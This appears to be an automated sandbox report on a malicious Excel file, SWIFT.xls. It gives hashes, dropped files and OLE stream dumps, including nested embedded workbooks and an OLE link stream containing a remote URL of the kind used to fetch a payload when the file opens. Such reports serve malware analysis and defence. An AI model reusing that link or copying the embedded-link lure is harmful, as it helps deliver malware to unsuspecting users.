              SSDEEP:3::
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 14:22:20 2024, Security: 1
              Category:dropped
              Size (bytes):697344
              Entropy (8bit):7.77944542077821
              Encrypted:false
              SSDEEP:12288:bURo+aBfwVmefX0ygphV9BovAq6LGMxIH7Kbg9tAAJfKZKg/ewlGyID:4R2bphV9y36LDIH7zNkKLyFI
              MD5:F7DDB04D388F1F0ED454D9EE5E8F0C04
              SHA1:A337BB382C2B9C75EE2D37007473D645DD6B562B
              SHA-256:B418C376DEAD0315A55680D13BB7D1C1C1D017D0124CE6B25909DF38496CA24A
              SHA-512:5F90F1B28C47A2D2A1FE512995AC3702BDC3D453783E654BB0DB16CB871D464E82B6CF6952336DC4E0700D0D3326904BB62A46A649F42D98CAFFD270EDD07299
              Malicious:false
              Preview:......................>...............................................................................h.......j........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:false
              Preview:[ZoneTransfer]....ZoneId=0
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 14:22:20 2024, Security: 1
              Category:dropped
              Size (bytes):697344
              Entropy (8bit):7.77944542077821
              Encrypted:false
              SSDEEP:12288:bURo+aBfwVmefX0ygphV9BovAq6LGMxIH7Kbg9tAAJfKZKg/ewlGyID:4R2bphV9y36LDIH7zNkKLyFI
              MD5:F7DDB04D388F1F0ED454D9EE5E8F0C04
              SHA1:A337BB382C2B9C75EE2D37007473D645DD6B562B
              SHA-256:B418C376DEAD0315A55680D13BB7D1C1C1D017D0124CE6B25909DF38496CA24A
              SHA-512:5F90F1B28C47A2D2A1FE512995AC3702BDC3D453783E654BB0DB16CB871D464E82B6CF6952336DC4E0700D0D3326904BB62A46A649F42D98CAFFD270EDD07299
              Malicious:true
              Preview:......................>...............................................................................h.......j........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 10:40:27 2024, Security: 1
              Entropy (8bit):7.781464205116081
              TrID:
              • Microsoft Excel sheet (30009/1) 47.99%
              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
              File name:SWIFT.xls
              File size:699'392 bytes
              MD5:ed7928a72e06e8122d90ae9eb43736d6
              SHA1:784a817af018202ee02bad8760c85b996942a38b
              SHA256:e5d3f77e814bb0dfe7773205bf105a2b9d08f6f0245b7c1808e1c72748e180e9
              SHA512:7cbd2c5cda4c2fa86a4a6c77b90172582ff35dea7a724d2fdb1bfd4d9213372c3fb53a2b6e3886d4346fe48fe7ac45774f79e94462f3e98f5d9018ffa84f6653
              SSDEEP:12288:TsMo+aBfwVmefX0ygphV4Bzvwq6LGMxIH7KbpNE473f9tR8IO0mvg99Gr+3nKcA:IM2bphV4dH6LDIH7KJry/G9kKz
              TLSH:EDE40222F6C9DE47E856173553A322435B33BC6A5F634A0B6354732A3EB36C0C913A67
              File Content Preview:........................>...............................................................................a.......c..............................................................................................................................................
              Icon Hash:35ed8e920e8c81b5
              Document Type:OLE
              Number of OLE Files:1
              Has Summary Info:
              Application Name:Microsoft Excel
              Encrypted Document:True
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:True
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:False
              Code Page:1252
              Author:
              Last Saved By:
              Create Time:2006-09-16 00:00:00
              Last Saved Time:2024-12-20 10:40:27
              Creating Application:Microsoft Excel
              Security:1
              Document Code Page:1252
              Thumbnail Scaling Desired:False
              Contains Dirty Links:False
              Shared Document:False
              Changed Hyperlinks:False
              Application Version:786432
              General
              Stream Path:\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.25248375192737
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:244
              Entropy:2.889430592781307
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
              General
              Stream Path:\x5SummaryInformation
              CLSID:
              File Type:data
              Stream Size:200
              Entropy:3.292068105701867
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . R . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
              General
              Stream Path:MBD006D439E/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.25248375192737
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:MBD006D439E/\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:248
              Entropy:2.7990677635209242
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C a i s s e 2 0 2 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00
              General
              Stream Path:MBD006D439E/\x5SummaryInformation
              CLSID:
              File Type:data
              Stream Size:244
              Entropy:3.8527227374003603
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t C o r p o r a t i o n . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . @ . . . . c ? . @ . . . . Q w R . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e4 04 00 00
              General
              Stream Path:MBD006D439E/MBD006D2A09/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.25248375192737
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:MBD006D439E/MBD006D2A09/\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:248
              Entropy:3.0523231150355867
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
              General
              Stream Path:MBD006D439E/MBD006D2A09/\x5SummaryInformation
              CLSID:
              File Type:data
              Stream Size:256
              Entropy:4.119175032995043
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . + d R . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
              General
              Stream Path:MBD006D439E/MBD006D2A09/MBD00049180/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:94
              Entropy:4.345966460061678
              Base64 Encoded:False
              Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:MBD006D439E/MBD006D2A09/MBD00049180/\x1Ole
              CLSID:
              File Type:data
              Stream Size:20
              Entropy:0.5689955935892812
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . .
              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:MBD006D439E/MBD006D2A09/MBD00049180/CONTENTS
              CLSID:
              File Type:PDF document, version 1.7, 1 pages
              Stream Size:20909
              Entropy:7.967116806702583
              Base64 Encoded:True
              Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 3 0 R . > > . e n d o b j . 4 0 o b j . < < . / P r o d u c e r ( 3 . 0 . 4 \\ ( 5 . 0 . 8 \\ ) ) . / M o d D a t e ( D : 2 0 2 3 0 9 2 2 0 3 2 2 4 8 + 0 2 ' 0 0 ' ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / P a g e s . / K i d s [ 5 0 R ] . / C o u n t 1 . > > . e n d o b j . 3 0 o b j . < < . / F i e l d s [ ] . / D R 6 0 R . > > . e n d
              Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 33 2e 30 2e 34 20 5c 28 35 2e 30 2e 38 5c 29 20 29 0a 2f 4d 6f 64 44 61 74 65
              General
              Stream Path:MBD006D439E/MBD006D2A09/Workbook
              CLSID:
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:134792
              Entropy:7.983675562880349
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . ) . D @ : 4 w . B . N S . . [ . . . . . R . . K . . . . . . . 3 . . . \\ . p . . . i . ) = @ . Y 9 u ? 8 . S q . . = N . . = . . x . ^ . > . ) i . . 7 Y . J ; . a ^ { B . . 2 m . . v 7 w . C . M c H , l U y , . W V B . . . g . a . . . 9 . . . . = . . . f 2 . . . . X . . . . < ) N > L . . . . . . . . . . . . . . ' [ . . . . . . . . J = . . . 2 ' . l C . @ . . . . . . . " . . . . . . . . 5 t . . . . . . . . 1 . . . p . S p . n . R . . h f ) z 1 . . . C E
              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 f7 04 c7 29 d9 df ad 44 c7 40 ff 3a b9 34 77 ec 08 42 ea 18 b9 4e 81 a9 53 00 e1 12 5b 85 8f 9a 13 9f 01 d7 93 1e dc 9b 95 52 02 16 ba 4b f0 b0 e1 00 02 00 b0 04 c1 00 02 00 f0 33 e2 00 00 00 5c 00 70 00 0a ec 83 09 9b 69 df ad a9 29 9a d7 ef ea c1 3d 40 c6 d4 b9 a8 59 ec 39 75 3f 38 e7 0a d5
              General
              Stream Path:MBD006D439E/MBD006D34A9/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.25248375192737
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:MBD006D439E/MBD006D34A9/\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:364
              Entropy:3.4605270620647737
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 3c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 78 00 00 00 0b 00 00 00 80 00 00 00 10 00 00 00 88 00 00 00 13 00 00 00 90 00 00 00 16 00 00 00 98 00 00 00 0d 00 00 00 a0 00 00 00 0c 00 00 00 17 01 00 00
              General
              Stream Path:MBD006D439E/MBD006D34A9/\x5SummaryInformation
              CLSID:
              File Type:data
              Stream Size:264
              Entropy:3.861977664967372
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 4 . . @ . . . . 9 . @ . . . . C p R . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 02 00 00 00 58 00 00 00 04 00 00 00 70 00 00 00 08 00 00 00 84 00 00 00 12 00 00 00 94 00 00 00 0b 00 00 00 ac 00 00 00 0c 00 00 00 b8 00 00 00 0d 00 00 00 c4 00 00 00 13 00 00 00 d0 00 00 00
              General
              Stream Path:MBD006D439E/MBD006D34A9/Workbook
              CLSID:
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:28794
              Entropy:3.895705393727193
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . x . < . - . 9 .
              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 80 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
              General
              Stream Path:MBD006D439E/MBd006D26D0/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.219515110876372
              Base64 Encoded:False
              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:MBD006D439E/MBd006D26D0/Package
              CLSID:
              File Type:Microsoft Excel 2007+
              Stream Size:14238
              Entropy:7.304582151499508
              Base64 Encoded:True
              Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              General
              Stream Path:MBD006D439E/Workbook
              CLSID:
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:215117
              Entropy:7.7174755790684175
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . # . 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
              General
              Stream Path:MBd006D439F/\x1Ole
              CLSID:
              File Type:data
              Stream Size:660
              Entropy:4.594258403837487
              Base64 Encoded:False
              Data ASCII:. . . . . F + . I . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . l . q . S . a . 1 . A . o . h . ? . & . l . i . n . e . n . = . f . r . i . g . h . t . e . n . e . d . & . t . r . u . m . p . e . t . . . . w 1 h _ x . A = c A q H v . u z U q . G J G E x M . r . w r 0 C . . . . . . . . . . . . . . . . . . . 1 . 8 . 9 . b . J . 8 . U . x . U . r . T . S . R . s . v . V . X . o . y . B . 6 . u . 2 . P . 8 . k . h . U . s . j
              Data Raw:01 00 00 02 09 da 46 2b c3 14 c4 49 00 00 00 00 00 00 00 00 00 00 00 00 a8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b a4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 6c 00 71 00 53 00 61 00 31 00 41 00 6f 00 68 00 3f 00 26 00 6c 00 69 00 6e 00 65 00 6e 00 3d 00 66 00 72 00 69 00
              General
              Stream Path:Workbook
              CLSID:
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:269152
              Entropy:7.998093375369374
              Base64 Encoded:True
